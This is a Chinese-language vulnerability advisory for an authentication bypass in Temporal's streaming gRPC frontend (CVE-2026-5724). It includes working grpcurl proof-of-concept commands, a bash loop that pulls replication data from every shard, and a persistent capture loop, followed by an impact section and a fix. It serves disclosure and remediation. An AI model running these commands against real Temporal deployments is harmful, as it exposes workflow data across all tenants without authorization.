tibrn/CVE-2026-5724

## 概要 Temporal 前端服务未对流式 gRPC RPC 强制执行身份验证。流式拦截器链省略了授权拦截器，允许未经身份验证的调用者访问 `AdminService/StreamWorkflowReplicationMessages`，这是一个仅限管理员使用的特权端点，可跨所有命名空间流式传输工作流复制数据。 #### 细节 位于 `service/frontend/fx.go` 的前端 gRPC 服务器配置了两个拦截器链。流式链仅包含用于指标收集的 `telemetryInterceptor.StreamIntercept`，而没有身份验证： https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/service/frontend/fx.go#L292-L294 `authorization.Interceptor` 类型仅实现了单次拦截器方法（`Intercept`）。不存在对应的流式拦截方法。前端唯一的流式 RPC 是 `AdminService/StreamWorkflowReplicationMessages`，根据 https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/common/api/metadata.go#L214-L215，它应要求 `{Scope: ScopeCluster, Access: AccessAdmin}`。该流式调用在 [admin_handler.go:1904](https://github.com/temporalio/temporal/blob/c9a39e6914c0b3a114ddfe42e991334ed911a4cf/service/frontend/admin_handler.go#L1904-1905) 处未经授权即到达处理程序，并在该处直接代理到内部 history 服务的 replication 端点。 #### PoC 以一个暴露了前端 gRPC API 的 Temporal 部署为例。 在没有任何凭据的情况下调用流式 AdminService RPC： ``` grpcurl -max-time 15 \ -H "temporal-client-cluster-id: 1" \ -H "temporal-client-shard-id: 1" \ -H "temporal-server-cluster-id: 1" \ -H "temporal-server-shard-id: 1" \ -d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \ temporal-frontend.example.com:443 \ temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages # Stream 连接。Server 响应 replication state，包含 # 每个 shard 的 exclusiveHighWatermark。在 active replication 期间， # response 包含序列化的 workflow history events： # { # "messages": { # "replicationTasks": [{ # "namespaceId": "...", # "workflowId": "...", # "runId": "...", # "taskType": "REPLICATION_TASK_TYPE_HISTORY_V2_TASK", # ... # }], # "exclusiveHighWatermark": "148293" # } # } ``` 遍历所有分片并大规模提取数据： ``` #!/usr/bin/env bash set -euo pipefail TARGET="${1:-temporal-frontend.example.com:443}" NUM_SHARDS="${2:-1024}" CLUSTER_ID="${3:-1}" # initialFailoverVersion: 1=active, 2=failover ADMIN_SVC="temporal.server.api.adminservice.v1.AdminService" for SHARD in $(seq 1 "${NUM_SHARDS}"); do grpcurl -max-time 10 \ -H "temporal-client-cluster-id: ${CLUSTER_ID}" \ -H "temporal-client-shard-id: ${SHARD}" \ -H "temporal-server-cluster-id: ${CLUSTER_ID}" \ -H "temporal-server-shard-id: ${SHARD}" \ -d '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' \ "${TARGET}" "${ADMIN_SVC}/StreamWorkflowReplicationMessages" 2>&1 || true done ``` 持久保持流处于打开状态并实时捕获复制事件： ``` ( while true; do echo '{"syncReplicationState":{"inclusiveLowWatermark":0,"highPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"},"lowPriorityState":{"inclusiveLowWatermark":0,"flowControlCommand":"REPLICATION_FLOW_CONTROL_COMMAND_RESUME"}}}' sleep 5 done ) | grpcurl -d @ \ -H "temporal-client-cluster-id: 1" \ -H "temporal-client-shard-id: 1" \ -H "temporal-server-cluster-id: 1" \ -H "temporal-server-shard-id: 1" \ temporal-frontend.example.com:443 \ temporal.server.api.adminservice.v1.AdminService/StreamWorkflowReplicationMessages ``` #### 影响 有权访问前端的攻击者可以在没有任何凭据的情况下，读取跨所有命名空间和租户的工作流复制数据——包括工作流 ID、运行 ID、历史事件、活动负载。攻击者还可以通过发送 `SyncReplicationState` 消息来干扰跨数据中心复制，并获得通往通常从不对外暴露的内部 history 服务的桥梁。 #### 解决方案 在 `authorization.Interceptor` 上实现 `StreamServerInterceptor`，并将其添加到 `service/frontend/fx.go:292-296` 的流式链中： ``` streamInterceptor := []grpc.StreamServerInterceptor{ telemetryInterceptor.StreamIntercept, authInterceptor.StreamIntercept, // enforce auth on streaming RPCs } ```

标签：CISA项目, CVE, gRPC, PoC, Python工具, SDLC, Temporal, Temporal Frontend, 中间件漏洞, 分布式系统, 响应大小分析, 安全漏洞, 工作流引擎, 应用安全, 微服务安全, 数字签名, 日志审计, 暴力破解, 未授权访问, 流式传输, 身份验证绕过, 鉴权缺失